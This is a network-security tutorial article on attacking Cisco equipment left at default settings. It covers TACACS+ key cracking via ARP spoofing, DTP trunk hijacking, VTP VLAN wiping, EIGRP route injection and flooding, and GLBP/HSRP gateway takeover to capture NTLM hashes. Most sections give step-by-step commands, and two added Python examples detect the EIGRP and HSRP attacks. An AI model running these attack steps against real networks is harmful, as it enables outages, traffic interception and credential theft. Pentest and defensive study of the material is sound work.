Cisco Nightmare

Caster
31 min read · Sep 23, 2022


Intro

Throughout my career as a network security engineer, I have seen quite a few networks using Cisco equipment. And in most cases, this equipment was running with a default configuration, which puts the local network at great risk from a potential intruder. In this article you will learn what a nightmare Cisco networks can be if they are not set up properly.


Disclaimer

This article is intended for security specialists and pentesters. The skills you learn here are your responsibility alone. Be careful.

The author is not responsible for any harm caused by using the information in this article.

1. Abusing TACACS+ protocol

TACACS+ (Terminal Access Controller Access Control System) is a protocol designed to centrally manage the accounts used to administer network equipment. The TACACS+ server decides whether to allow or deny access to a user who attempts to log into the management interface of a network device.

If an attacker manages to get in the middle between the client and the TACACS+ server, he can capture the encrypted session and then brute-force the key locally against it. This way you both brute-force the key and stay out of the logs. And if the key is recovered, you can access the network equipment and decrypt the captured traffic in Wireshark: give Wireshark the key, and it decrypts the rest of the data, where the user's login is stored.

1.1 MITM / Intercepting key

First you have to perform a MITM attack; the method depends on the circumstances and your preferences. As an example, I will do ARP spoofing against the TACACS+ agent and the TACACS+ server.

However, you won't always be able to perform a MITM attack.

If you have a dump with TACACS+ traffic, you can replay it on your network interface (yes, we are talking about tcpreplay now).

The TACACS agent will be switch SW1 with the IP address 10.10.100.10
The TACACS server will be a TACACSGUI with an address of 10.10.100.70

I perform the ARP spoofing itself with the Ettercap utility. First, you need to switch the interface to promiscuous mode and enable IP forwarding:

~$ sudo ip link set eth0 promisc on
~$ sudo sysctl -w net.ipv4.ip_forward=1

Now start Ettercap.

~$ sudo ettercap -G
Ettercap tool

The listening interface will be eth0. Let’s start the host scanning.

Scanning the hosts (via ARP)

Target 1 will be a host with an IP address of 10.10.100.10 and Target 2 will be 10.10.100.70

ARP Spoofing attack

1.2 Loki tool.

Now you need to run Loki. This is a special tool designed to analyze the security of L2/L3 protocols. Its capabilities are just as good as those of the popular Yersinia, and it is a serious competitor to it. Loki can also brute-force TACACS+ keys. If the key is successfully brute-forced (it is usually captured in MD5-based encrypted form), we can access the equipment and decrypt the TACACS+-encrypted traffic.

Let’s start Loki.

~$ sudo loki_gtk.py
Select the network interface

You also need to specify the path to the dictionary in order to bruteforce the encrypted key. Be sure to uncheck the Use Bruteforce option, otherwise Loki will bruteforce the password without using the dictionary.

Setting the path to wordlist

Now we have to wait for an administrator to log into the device through the TACACS+ server. Assume the network administrator has logged in while we, standing in the middle via ARP spoofing, intercept the traffic. The legitimate hosts do not realize that someone else has interfered with their connection.

Loki found a TACACS+ connection

Now click the CRACK button and wait for Loki to break the password.

Loki cracked the TACACS key. Password: secret1234

Great, we recovered the key; now we need to decrypt the TACACS+ traffic. As I said, Wireshark can handle encrypted TACACS+ traffic if the key is provided.

Feeding Wireshark the key

We see which banner was used.

The banner used.

We find the username: admin

As a result, we have the admin:secret1234 credentials, which can be used to access the hardware itself. I think I’ll check their validity.

Successfully gaining access to the equipment

This is how you can attack TACACS+ and gain access to the control panel of network equipment.

2. CDP Protocol

CDP (Cisco Discovery Protocol) is a Cisco Systems development, a data link layer protocol designed to let devices exchange information about themselves. CDP can help the network administrator and simplify troubleshooting, but for an intruder… Let's find out now.

2.1 Information Gathering

By default, a Cisco device sends CDP announcements out of all its ports. But what if an intruder connects to a port on the same switch? Using a network sniffer, be it Wireshark or tcpdump, he can extract valuable information about the device itself, from its model to the Cisco IOS version. With this information he can look up known vulnerabilities for that exact Cisco IOS version and then exploit them.

CDP traffic dump

2.2 CDP Flooding Attack

If an attacker provokes a huge number of CDP announcements, the flooding itself will overload the switch and disrupt the network. The CDP neighbor table will also overflow. This attack is simple, so I will not go into detail.

I will use Yersinia for this.

~$ sudo yersinia -G
Switch SW1 detected

Select the flooding CDP table option and start the attack. The switch CPU will be overloaded, as well as the CDP neighbor table, resulting in “network paralysis”.

Beginning of the attack
Overloaded switch CPU

3. Abusing Dynamic Trunking

DTP (Dynamic Trunking Protocol) is a link layer protocol designed to negotiate trunks automatically. With DTP, switches decide which port will work in trunk mode (Trunk) and which will not. In my opinion, the use of DTP indicates poor network design. Trunks should be strictly where they are needed, and they should be documented. It's especially funny when the network engineer himself doesn't know which port is in trunk and which is in access mode.

By default, all switch ports operate in Dynamic Auto mode. This means the port will become a trunk if the neighboring device initiates trunk negotiation. The pentester needs to physically connect to the switch and send a DTP Desirable frame, which triggers the port to switch to trunk mode. The attacker can then enumerate VLANs by analyzing STP frames and bypass VLAN segmentation by creating virtual (802.1Q) interfaces.

For the attack we need a script that will generate the DTP Desirable frame. For this I wrote a small program called DTPHijacking.py. Its source code is open, you can study it. However, do not interrupt the script under any circumstances: it injects a DTP Desirable frame every three seconds, and a dynamically negotiated trunk on the switch only lives for five minutes. After five minutes without negotiation, the trunk is torn down.

~$ sudo python3 DTPHijacking.py --interface eth0

I would like to point out that Access/Desirable (0x03) indicates that the DTP frame is of the Desirable type, which tells the port to switch to Trunk mode. And 802.1Q/802.1Q (0xa5) indicates the 802.1Q encapsulation type.

By analyzing the STP frames, we learn about the existence of VLAN 30 and VLAN 60.

STP frames analysis

With this information and a trunk port, we can access these VLANs while bypassing VLAN segmentation. We will need to create virtual interfaces and assign an IP address to them.

in9uz@Inguz:~$ sudo vconfig add eth0 30
in9uz@Inguz:~$ sudo vconfig add eth0 60
in9uz@Inguz:~$ sudo ip link set eth0.30 up
in9uz@Inguz:~$ sudo ip link set eth0.60 up
in9uz@Inguz:~$ sudo dhclient -v eth0.30
in9uz@Inguz:~$ sudo dhclient -v eth0.60

Thus, it is possible to bypass VLAN segmentation and access VLAN networks.

4. Network Paralysis when attacking VTP protocol

VTP (VLAN Trunking Protocol) is a protocol designed to centrally manage VLANs. To keep track of the current VLAN database, switches compare special revision numbers. Whenever the VLAN table is updated, the revision number is incremented by one. If a switch receives a configuration with a higher revision number, it automatically updates its VLAN database.

4.1 Roles in a VTP domain

  • VTP Server. A switch in the VTP Server role can create new VLANs, delete old ones, or change information in the VLANs themselves. It also generates VTP announcements for the rest of the domain members.
  • VTP Client. A switch in this role will receive specific VTP announcements from other switches in the domain to update the VLAN databases on its own. Clients are limited in their ability to create VLANs and are not even allowed to change the VLAN configuration locally. In other words, read only access.
  • VTP Transparent. In this mode, the switch does not participate in VTP processes and keeps full, local administration of its entire VLAN configuration. When operating in transparent mode, switches only forward VTP announcements from other switches without applying them to their own VLAN configuration. Such switches always have a revision number of zero and cannot be attacked.

4.2 Advertisement types

  • Summary Advertisement — the VTP announcement that the VTP server sends every 300 seconds (5 minutes). This announcement stores the VTP domain name, protocol version, timestamp, and MD5 configuration hash value.
  • Subset Advertisement — this is the VTP advertisement that is sent whenever a VLAN configuration change occurs.
  • Advertisement Request — a request from a VTP client to the VTP server for a Summary Advertisement message. It is usually sent after a switch has received a Summary Advertisement with a higher configuration revision number than its own.

VTP can only be attacked from a trunk port, because VTP announcements are only broadcast and received on trunk ports. Therefore, when pentesting after attacking DTP, your next target could be VTP. To attack the VTP domain I will use Yersinia. With it I will run a VTP inject that will erase the entire VLAN database and thus paralyze the network.

!!! The VTP protocol has as many as three versions. In this article I will perform an attack against the first version, VTPv1 !!!

To erase the entire VLAN database, select the deleting all VTP vlans option.

Beginning of the attack
VLAN database before an attack
VLAN database after an attack
Network Paralysis (for host in VLAN 60)

A host on VLAN 60 has lost connectivity to the gateway… *yikes*

5. Attacking EIGRP Protocol

EIGRP (Enhanced Interior Gateway Routing Protocol) is a dynamic routing protocol of the distance-vector family. If there is no authentication and no passive-interface configuration, an intruder can interfere with EIGRP routing and poison routing tables. Moreover, an EIGRP network (in other words, an autonomous system) is flat and has no division into areas. What could this mean for an attacker? Well, if he injects a route, it is likely that this route will spread throughout the EIGRP autonomous system.

EIGRP Relationship Deconstruction

First and foremost, attacking an EIGRP autonomous system requires establishing a neighbor relationship with a legitimate EIGRP router, which opens up a lot of possibilities, from basic reconnaissance to various injections.

For this I will use FRRouting. This is an open-source routing suite for Unix and Linux. FRRouting implements a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols. All you need to do is deploy it on the attacking system, and you can pose as a legitimate router in the routing domain. I'll show you how to deploy FRR on your system in the next section.

5.1 Network Intelligence

Connecting to the routing domain lets us enumerate networks without spending a lot of time scanning, which saves precious time. Besides, scanning can get you burned in front of IPS/IDS systems. To me, joining the domain and enumerating it is the attack vector on routing domains that gives the most impact. But to do this you need to deploy FRRouting. Here we go.

First, edit the daemons configuration file. It lists the FRR daemons and whether each one is enabled (yes) or not (no). We need to activate the eigrpd daemon.

~# nano /etc/frr/daemons
eigrpd=yes
FRR daemons config file

After that, adjust the vtysh.conf file by adding a line that keeps the configuration in one file, so that the configurations of different protocols are not scattered across separate files (e.g. eigrpd.conf, staticd.conf). This step is optional.

~# nano /etc/frr/vtysh.conf
service integrated-vtysh-config

The FRRouting configuration is done. Now it's time to run the FRR daemon. And yes, we need to enable IP forwarding, which is disabled by default in Linux distributions.

~$ sudo systemctl start frr
~$ sudo sysctl -w net.ipv4.ip_forward=1
FRR daemon status

The vtysh command will take us to the FRR router control panel.

~$ sudo vtysh

Example:

Inguz# show version
FRR control panel

However, before configuring EIGRP on the FRR router, you need to know the autonomous system number and understand if there is authentication.

EIGRP Packet Deconstruction

However, don't forget that the EIGRP routing domain can be protected by authentication. You still have a chance to connect to the routing domain: the hello packets carry cryptographic hashes, and if you extract these hashes from a traffic dump and crack the password, you can join the routing domain with it.

Go to global configuration mode and start the EIGRP process, specifying the autonomous system number, 1.

And we also need to declare the network we are in. We are at 10.10.100.0/24. My address is 10.10.100.50/32

Inguz# config
Inguz(config)# router eigrp 1
Inguz(config-router)# network 10.10.100.50/32

After that, neighbor relationships with the legitimate EIGRP routers are established. There are two of them on my network:

  • GW1 (10.10.100.100)
  • GW2 (10.10.100.200)

EIGRP Neighborship with GW1 (10.10.100.100)
EIGRP Neighborship with GW2 (10.10.100.200)

During the establishment and maintenance of the neighborhood between EIGRP routers, routers exchange their routing information. After the neighborhood is established, new routes will appear in our routing table of the attacking system, namely:

  • 10.1.239.0/24 via 10.10.100.100;
  • 30.30.30.0/24 via 10.10.100.100;
  • 100.100.100.0/24 via 10.10.100.100;
  • 172.16.100.0/24 via 10.10.100.200

Routing table

Thus, after establishing the neighborhood, we know about the existence of these subnets, which makes it easier for us to pentest and save time. We can do without additional subnet scanning. Now we are in the EIGRP routing domain and we can develop some attack vectors. Let’s talk about them.

5.2 Fake EIGRP Neighbors

I have found that generating and quickly sending out mass EIGRP hello packets overloads the router's CPU, which in turn can open the door to a DoS attack. I have developed a little helloflooding.py script, but it seems to me that the script lacks speed in sending out the packets. It's caused by the GIL, which prevents the sprayhello function from running in multiple threads at once. Eventually I'll rewrite the script in C.

helloflooding.py

Arguments of the script:

  • Interface of the attacking system (eth0);
  • EIGRP autonomous system number (1);
  • Subnet where the attacking system is located. In my case, the subnet is 10.10.100.0/24

~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
CPU overload during an attack

5.3 EIGRP Blackhole

The essence of this attack is a simple injection of a false route that will poison the routing table. Traffic to, say, the 10.10.100.0/24 network will go nowhere, causing a denial of service. Such an attack is called a Blackhole. The script routeinject.py will be the tool used to perform it. For this example, I will send traffic destined for host 172.16.100.140/32 to the black hole.

routeinject.py

Arguments of the script:

  • interface of the attacking system
  • EIGRP AS number
  • IP address of the attacker
  • IP address of the target subnet whose traffic will be sent to the black hole
  • target subnet mask

~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
Body of malicious EIGRP injection

Our host seems to be in trouble :)

Lost Connectivity

As you can see, the host loses connectivity to host 172.16.100.140/32 due to route injection.

Malicious route in the routing table

5.4 Abusing K-Values

To establish EIGRP neighbor relationships, routers use special K-values. They must be the same among all EIGRP neighbors. If at least one K-value does not match, the EIGRP domain breaks down and the neighbor relationship is torn down. We will use relationshipnightmare.py to perform this attack.

Script arguments:

  • network interface
  • EIGRP AS number
  • IP Address of legitimate router

An injected packet with mismatching K-values will be sent to the EIGRP multicast address on behalf of the specified IP. In my case, I will break the neighbor relationship on behalf of router GW1 (address 10.10.100.100).

~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
Dump of traffic during a neighborhood disruption
GW1 router endlessly disconnects and reconnects EIGRP

A DoS attack can be carried out in this way. While the script runs, the neighbor relationship is endlessly torn down and re-established, paralyzing part of the EIGRP routing domain.
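As an added example (not part of the original article or its scripts), here is a defender-side baseline audit of EIGRP hello packets that detects the K-value tampering of section 5.4, the hello floods of section 5.2 and the unexpected neighbors of section 5.1. It assumes the EIGRP header layout (version, opcode, checksum, flags, sequence, ack, virtual router ID, AS number) and the Parameters TLV (K1..K5, a reserved byte, 16-bit hold time); the capture, baseline and router addresses are constructed sample data.

```python
"""Baseline audit of EIGRP hello packets (IP protocol 88, multicast 224.0.0.10).

Added example for this article (not the author's scripts): parses the 20-byte EIGRP
header plus the Parameters TLV and flags K-value tampering, hellos from addresses
that are not known neighbors, and hello floods.
"""
import struct
from collections import defaultdict

EIGRP_VERSION = 2
OPCODE_HELLO = 5
TLV_PARAMETERS = 0x0001  # value: K1..K5, reserved byte, 16-bit hold time


def parse_eigrp_hello(payload: bytes) -> dict:
    """Return {"as": ..., "k": (K1..K5), "hold": seconds} for an EIGRP hello."""
    if len(payload) < 20:
        raise ValueError("shorter than the 20-byte EIGRP header")
    version, opcode, _csum, _flags, _seq, _ack, _vrid, as_number = struct.unpack(
        "!BBHIIIHH", payload[:20])
    if version != EIGRP_VERSION or opcode != OPCODE_HELLO:
        raise ValueError(f"not an EIGRP hello (version={version}, opcode={opcode})")
    info = {"as": as_number, "k": None, "hold": None}
    offset = 20
    while offset + 4 <= len(payload):  # walk the TLVs that follow the header
        tlv_type, tlv_len = struct.unpack("!HH", payload[offset:offset + 4])
        if tlv_len < 4 or offset + tlv_len > len(payload):
            raise ValueError("truncated TLV")
        value = payload[offset + 4:offset + tlv_len]
        if tlv_type == TLV_PARAMETERS and len(value) >= 8:
            info["k"] = tuple(value[:5])
            info["hold"] = struct.unpack("!H", value[6:8])[0]
        offset += tlv_len
    if info["k"] is None:
        raise ValueError("hello without a Parameters TLV")
    return info


def audit_hellos(capture, baseline, flood_window=1.0, flood_threshold=10):
    """capture: (timestamp, src_ip, payload) tuples in time order.
    baseline: {"as": int, "k": (K1..K5), "neighbors": {router IPs}}.
    Returns (src_ip, rule, detail) alerts; an empty list means nothing suspicious."""
    alerts = []
    recent = defaultdict(list)  # src_ip -> timestamps inside the flood window
    for ts, src, payload in capture:
        try:
            hello = parse_eigrp_hello(payload)
        except ValueError as err:
            alerts.append((src, "malformed", str(err)))
            continue
        if hello["as"] != baseline["as"]:
            alerts.append((src, "as-mismatch", f"AS {hello['as']} instead of {baseline['as']}"))
        if hello["k"] != baseline["k"]:
            # Mismatched K-values make neighbors drop the adjacency (section 5.4).
            alerts.append((src, "k-mismatch",
                           f"K-values {hello['k']} differ from baseline {baseline['k']}"))
        if src not in baseline["neighbors"]:
            alerts.append((src, "unknown-neighbor", "hello from an address not in the neighbor list"))
        window = recent[src]
        window.append(ts)
        while ts - window[0] > flood_window:
            window.pop(0)
        if len(window) == flood_threshold:  # fires once when the burst crosses the threshold
            alerts.append((src, "hello-flood", f"{flood_threshold} hellos within {flood_window}s"))
    return alerts


def sample_hello(as_number, k, hold=15):
    """Build a constructed hello payload for the sample capture below (test data only)."""
    header = struct.pack("!BBHIIIHH", EIGRP_VERSION, OPCODE_HELLO, 0, 0, 0, 0, 0, as_number)
    params = struct.pack("!HH5BBH", TLV_PARAMETERS, 12, *k, 0, hold)
    return header + params


# Constructed sample (not a capture from the article): two legitimate routers,
# one unknown speaker, one spoofed hello with altered K-values, then a burst.
BASELINE = {"as": 1, "k": (1, 0, 1, 0, 0), "neighbors": {"10.10.100.100", "10.10.100.200"}}
LEGIT = sample_hello(1, (1, 0, 1, 0, 0))
SAMPLE_CAPTURE = sorted(
    [
        (0.0, "10.10.100.100", LEGIT),
        (0.2, "10.10.100.200", LEGIT),
        (1.0, "10.10.100.50", LEGIT),                              # not a known neighbor
        (2.0, "10.10.100.100", sample_hello(1, (1, 2, 3, 4, 5))),  # altered K-values, GW1's address
        (5.0, "10.10.100.100", LEGIT),
        (5.2, "10.10.100.200", LEGIT),
    ]
    + [(3.0 + 0.01 * i, "10.10.100.50", LEGIT) for i in range(30)],  # 30 hellos in 0.3 s
    key=lambda entry: entry[0],
)

if __name__ == "__main__":
    for src, rule, detail in audit_hellos(SAMPLE_CAPTURE, BASELINE):
        print(f"{src:15} {rule:17} {detail}")
```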

5.5 Routing table overflow

The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the router's computing resources, namely CPU and RAM, since the injections occur at enormous speed. This attack is implemented by the routingtableoverflow.py script.

Script arguments:

  • network interface
  • EIGRP AS number
  • attacker's IP address

in9uz@Inguz:~$ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50

After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of RandIP() in Scapy.

Routing table overflows on GW1 router
Overloaded router CPU

6. FHRP Hijacking

6.1 What is FHRP?

FHRP (First Hop Redundancy Protocol) is a class of network protocols designed to create a hot redundant routing system. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps distribute the load.

Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP, which I will demonstrate next.

6.2 GLBP Protocol

GLBP was developed by Cisco Systems engineers. Like HSRP, it runs on top of the TCP/IP stack and uses UDP port 3222 to carry its service information. GLBP routers within the same logical group exchange special “hello” packets every 3 seconds; if a GLBP router has not received a hello packet from a neighbor in the same group within 10 seconds, it considers that neighbor “dead”. The timer values can be configured to suit the administrator's needs.

6.3 The skeleton and mechanics of GLBP

GLBP provides load sharing to multiple routers (gateways) using one virtual IP address and multiple virtual MAC addresses. Each host is configured with the same virtual IP address and all routers in the virtual group participate in packet transmission.

It works quite differently from HSRP and VRRP because it uses true load-balancing mechanisms, which I describe below:

Host-Dependent. A load-balancing type used on networks where there is NAT. Host-Dependent guarantees that a host always gets back the same AVF MAC address it received earlier, so the NAT state bound to that host is not broken.

Round-Robin. In this mode, the AVG hands out the MAC addresses of the AVF members in turn. This is the mechanism used by default.

Weight-based round-robin. Load balancing based on a special “Weight” metric.

6.4 Roles in the GLBP domain & Terminology

AVG (Active Virtual Gateway) — the router with the leading role is also responsible for distributing MAC addresses to other routers within the same GLBP group. A kind of “boss” in the GLBP domain. AVG tells the other routers how to distribute traffic by handing out MAC addresses when an ARP request arrives. It is worth noting that there can only be one AVG router in a GLBP domain, but it can also be an AVF member.

AVF (Active Virtual Forwarder) — a router in a GLBP group handling traffic in the network.

GLBP Priority — The priority value that determines which router in the GLBP group will be the AVG. The default value is 100 (the priority range can be from 1 to 255). It can be set manually, i.e. the network engineer himself determines which router will be the “superior” and which will be the “slave”. The higher the priority, the more likely the router will get the AVG role. Usually the AVG role is given to more powerful routers.

GLBP Weight — The value of the so-called GLBP Weight of a router in a GLBP group. GLBP Weight defines the load level of the router. This value is “floating” and can vary depending on the load on the physical channel (the Object Tracking mechanism is involved), but it can also be configured manually.

GLBP Virtual IP Address — the virtual IP address in the GLBP domain. Used as the default gateway address for legitimate hosts.

GLBP uses the reserved multicast IP address 224.0.0.102 and UDP port 3222 to send and process service information. Special GLBP Hello packets are sent every 3 seconds. If a GLBP router has not received a hello packet from a neighbor within 10 seconds, the neighbor is considered “dead” and drops out of the GLBP domain.

6.5 GLBP Attack Mechanism

The technique of this network attack is to impose your device as the main router by injecting a malicious GLBP packet with a maximum priority value. Successful exploitation leads to a DoS or MITM attack in which you can intercept traffic within the network, conduct a redirect, or cause a DoS as you take over the role of AVG router. All you have to do is build a GLBP packet with the highest priority value of 255 and direct it towards the local network.

Before attack
After attack

6.6 GLBP Injection (Loki)

To demonstrate this attack, I will use Loki. It will perform a malicious GLBP injection with a maximum priority value of 255 and a maximum weight value of 255. But before performing the attack, the following information needs to be examined:

  • The virtual IP address used in the GLBP domain
  • availability of authentication
  • Value of router priorities

We will be able to extract this information by analyzing GLBP traffic. We will use Wireshark.

As we see, only two routers are involved in the GLBP process: 10.10.100.100 and 10.10.100.200.

GLBP Ads
GLBP Advertisement from first router
GLBP Advertisement from second router

After analyzing GLBP traffic we have the following:

  • A misconfiguration was detected in the priority setting: the AVG is a GLBP router with priority 200, lower than the maximum, i.e. we have a vector for GLBP hijacking
  • no authentication
  • The virtual IP address used in the GLBP domain is 10.10.100.254

With this information, we can easily attack GLBP.

Loki found GLBP ads from two routers

Before the attack, switch to promiscuous mode and enable IP forwarding:

~$ sudo ip link set eth0 promisc on
~$ sudo sysctl -w net.ipv4.ip_forward=1

Select the router at IP address 10.10.100.100 and activate the Get IP option. You also need to generate a Gratuitous ARP.

Launch of attack
The structure of a malicious GLBP injection

As you can see, the attacking system is now the AVG router. The priority value is 255 and the weight value is 255, i.e. the maximum.

After performing the injection we need to create a secondary IP address on our network interface with the value of the virtual IP address in the GLBP domain. You also need to set a 24-bit mask.

This way legitimate traffic will be looped back to us, because the virtual IP address used in the GLBP domain is the default gateway address for hosts:

~$ sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0

To see not only incoming traffic but also outgoing traffic, we need a small rule for SNAT (masquerading):

~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

We also need to remove the default route on our machine and write a new one which will go through the former AVG router (address is 10.10.100.100). Even though we have hijacked the AVG role from the router, it will still be able to route traffic.

~$ sudo route del default
~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

That’s it, we are now the “man in the middle”! I will run the tool net-creds.py to analyze the traffic to look for important data. For example, unencrypted FTP traffic or NTLM hashes.

~$ sudo python2 net-creds.py -i eth0

After running the utility, I will try to read the SMB share with the IP address 172.16.100.70, which is behind the GLBP routers.

user@Boundless:~$ smbclient -L \\172.16.100.70 --user mercy
Intercepted NTLMv2-SSP hash

This is how you can intercept traffic within the network by attacking GLBP domains.

6.7 HSRP Hijacking

HSRP (Hot Standby Router/Redundancy Protocol) is a Cisco proprietary protocol that provides network gateway redundancy. The general idea is to combine several physical routers into one logical router with a common IP address. This virtual router address is assigned to the interface of the router holding the master role, which in turn takes care of traffic forwarding. In an HSRP domain, handling all traffic falls entirely on the router with the primary role, unlike GLBP, where load balancing using special metrics (priority and weight) is offered.

6.8 Roles in the HSRP domain & terminology

HSRP Active Router — a device that acts as a virtual router and provides forwarding of traffic from source networks to destination networks.
HSRP Standby Router — a device that acts as a standby router, waiting for the active router to fail. When the primary Active router fails, the Standby router will take over the primary role and take over the duties of the Active router.
HSRP Group — a group of devices that ensures the operation and fault tolerance of a logical router.
HSRP MAC Address — the virtual MAC address of the logical router in the HSRP domain.
HSRP Virtual IP Address — This is a special virtual IP address in the HSRP group. This IP address will be the default gateway for the end hosts, used on the logical router itself.

6.9 HSRP protocol versions

The HSRP protocol has two versions — HSRPv1 and HSRPv2. They differ in the following parameters:

  • The number of possible logical groups. HSRPv1 can have up to 255 groups. HSRPv2 can have up to 4096 groups
  • Multicast IP address. HSRPv1 uses IP address 224.0.0.2 to send service information, and HSRPv2 uses 224.0.0.102
  • Virtual MAC address. HSRPv1 uses 00:00:0C:07:AC:XX as its virtual MAC address. HSRPv2 has a virtual MAC address of 00:00:0C:9F:FX:XX (where XX is the HSRP group number)

HSRP uses the reserved IP address 224.0.0.2 or 224.0.0.102 (depending on the HSRP version) and the UDP transport layer protocol with port number 1985 to broadcast and process the service information. Special HSRP Hello packets are sent every 3 seconds. If the HSRP router does not receive a hello packet from a neighbor within 10 seconds, the neighbor will be considered “dead” and will drop out of the HSRP domain.
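As an added example (not code from the original article or from Loki), here is a defender-side check that parses HSRPv1 packets seen on UDP port 1985 and compares them with a baseline of the legitimate routers and virtual IP; it flags the priority-255 takeover pattern described in this section and, in the same spirit, for GLBP. It assumes the RFC 2281 layout of HSRPv1 (eight single-byte fields, 8 bytes of authentication data, 4-byte virtual IP); the capture, baseline and addresses are constructed sample data.

```python
"""Detect HSRPv1 Active-router hijack attempts from captured UDP/1985 payloads.

Added example for this article (not the author's code): a defender-side check that
parses the fixed 20-byte HSRPv1 header and compares each advertisement against a
baseline of the legitimate routers, their configured priorities and the virtual IP.
"""
import struct
from dataclasses import dataclass
from ipaddress import IPv4Address

OPCODES = {0: "Hello", 1: "Coup", 2: "Resign"}
STATES = {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}
# 8-byte plaintext authentication field; "cisco" padded with NULs is the IOS default.
DEFAULT_AUTH = b"cisco\x00\x00\x00"


@dataclass
class HsrpPacket:
    src_ip: str
    opcode: str
    state: str
    hellotime: int
    holdtime: int
    priority: int
    group: int
    auth: bytes
    virtual_ip: str


def parse_hsrp_v1(src_ip: str, payload: bytes) -> HsrpPacket:
    """Parse an HSRPv1 packet (RFC 2281 layout): 8 single-byte fields, 8 bytes of
    authentication data, then the 4-byte virtual IP address."""
    if len(payload) < 20:
        raise ValueError("HSRPv1 payload shorter than 20 bytes")
    version, opcode, state, hellotime, holdtime, priority, group, _reserved = struct.unpack(
        "!8B", payload[:8])
    if version != 0:
        raise ValueError(f"not HSRPv1 (version field = {version})")
    return HsrpPacket(
        src_ip=src_ip,
        opcode=OPCODES.get(opcode, f"opcode-{opcode}"),
        state=STATES.get(state, f"state-{state}"),
        hellotime=hellotime,
        holdtime=holdtime,
        priority=priority,
        group=group,
        auth=payload[8:16],
        virtual_ip=str(IPv4Address(payload[16:20])),
    )


def detect_hijack(capture, baseline, expected_vip):
    """capture: (src_ip, udp_payload) pairs seen on UDP/1985 towards 224.0.0.2.
    baseline: {legitimate router IP: configured priority}.
    Returns (src_ip, rule, detail) alerts; an empty list means nothing suspicious."""
    alerts = []
    highest_legit = max(baseline.values())
    for src, payload in capture:
        try:
            pkt = parse_hsrp_v1(src, payload)
        except ValueError as err:
            alerts.append((src, "malformed", str(err)))
            continue
        if src not in baseline:
            alerts.append((src, "unknown-speaker",
                           f"{pkt.opcode} for group {pkt.group} from a router not in the baseline"))
        if pkt.priority > highest_legit:
            # Priority 255 beats any legitimately configured router: the takeover signature.
            alerts.append((src, "priority-exceeds-baseline",
                           f"priority {pkt.priority} > highest legitimate priority {highest_legit}"))
        elif src in baseline and pkt.priority != baseline[src]:
            alerts.append((src, "priority-changed",
                           f"priority {pkt.priority} instead of configured {baseline[src]}"))
        if pkt.opcode == "Coup":
            alerts.append((src, "coup", f"claims the Active role with priority {pkt.priority}"))
        if pkt.virtual_ip != expected_vip:
            alerts.append((src, "vip-mismatch", f"advertises {pkt.virtual_ip}, expected {expected_vip}"))
        if pkt.auth == DEFAULT_AUTH:
            alerts.append((src, "default-auth", "plaintext default authentication string 'cisco'"))
    return alerts


# Constructed sample capture (not taken from the article): group 1, virtual IP
# 10.10.100.254, default plaintext authentication, hello 3 s / hold 10 s.
#                              ver op state hello hold prio grp rsv
SAMPLE_CAPTURE = [
    ("10.10.100.100", bytes([0, 0, 16, 3, 10, 200, 1, 0]) + DEFAULT_AUTH + bytes([10, 10, 100, 254])),
    ("10.10.100.200", bytes([0, 0, 8, 3, 10, 100, 1, 0]) + DEFAULT_AUTH + bytes([10, 10, 100, 254])),
    # Coup from an address that is not one of the two routers, priority 255.
    ("10.10.100.50", bytes([0, 1, 16, 3, 10, 255, 1, 0]) + DEFAULT_AUTH + bytes([10, 10, 100, 254])),
]
BASELINE = {"10.10.100.100": 200, "10.10.100.200": 100}
EXPECTED_VIP = "10.10.100.254"

if __name__ == "__main__":
    for src, rule, detail in detect_hijack(SAMPLE_CAPTURE, BASELINE, EXPECTED_VIP):
        print(f"{src:15} {rule:26} {detail}")
```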

6.10 HSRP Attack Mechanism

This is exactly the same as GLBP Hijacking. We need to perform a malicious HSRP injection with a maximum priority value of 255. This allows us to hijack the role of the Active router, opening the door to a MITM attack. But again, we need to examine the following information before conducting the attack:

  • The virtual IP address used in the HSRP domain
  • The presence of authentication
  • Value of router priorities

We can extract this information by analyzing HSRP traffic. Let’s use Wireshark.

As you can see in the screenshot, the HSRP process involves only two routers, with addresses 10.10.100.100 and 10.10.100.200.

HSRP Ads
First HSRP router
Second HSRP router

Based on the analysis of HSRP traffic, we have the following:

  • A misconfiguration was detected within the priority setting. Active router is considered to be a HSRP router with priority 200, that is, we have a vector for HSRP hijacking
  • the virtual IP address used in the HSRP domain is 10.10.100.254
  • MD5 authentication is used

Having authentication in the domain ties our hands, but I will fix that.

6.11 HSRP Authentication Bypassing

Save the HSRP traffic dump in .pcap format so that the extractor can correctly pull the MD5 hashes from it. I will use hsrp2john.py as the extractor:

~/cisconightmare/exfiltrate$ python2 hsrp2john.py hsrp_with_authentication.pcap
Extracted MD5 hashes from HSRP traffic dump

I will crack the hashes with John the Ripper, giving it the hashes as input. With the --wordlist switch I specify the path to the dictionary:

~/cisconightmare/exfiltrate$ john hsrp_hashes --wordlist=wordlistforbrute
Cracked HSRP domain password

As a result, we have a key to enter the HSRP domain — endgame.

6.12 HSRP Injection (Loki)

I will use the same Loki to attack the HSRP protocol. Among other things, it has a key injection feature, which helps us bypass authentication. Earlier, in the HSRP Hijacking section, we obtained all the necessary information about the HSRP domain.

Starting Loki.

Loki detected HSRP ads

Don’t forget to switch to promiscuous mode and allow traffic routing before conducting the attack:

~$ sudo ip link set eth0 promisc on
~$ sudo sysctl -w net.ipv4.ip_forward=1

Select the router with an address of 10.10.100.100 and a priority of 200. As the Secret parameter, enter the cracked password from the HSRP domain, generate a Gratuitous ARP and select the Get IP option.

The structure of a malicious HSRP injection

As we can see, the Active router is now our attacking system. The priority value is 255.

